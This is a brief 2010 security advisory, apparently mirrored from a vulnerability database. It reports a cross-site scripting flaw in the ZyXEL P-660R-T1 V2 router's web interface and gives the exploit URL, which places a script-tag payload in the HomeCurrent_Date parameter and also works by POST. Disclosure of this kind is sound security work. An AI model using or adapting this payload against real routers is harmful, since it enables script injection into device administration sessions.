Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25180
HistoryNov 24, 2010 - 12:00 a.m.

ZyXEL P-660R-T1 V2 XSS

2010-11-2400:00:00
vulners.com
21

#####################################################################################

Name : ZyXEL P-660R-T1 V2 XSS

Author : Usman Saeed from Xc0re Security Research Group

Homepage :http://www.xc0re.net

Dated : 22/11/2010

#####################################################################################

Exploit:

VECTOR :http://IP/Forms/home_1?&HomeCurrent_Date='<sCript>alert(1);</ScRiPt>'01%2F01%2F2000

This works with the post request ! As by default this value is sent through POST request.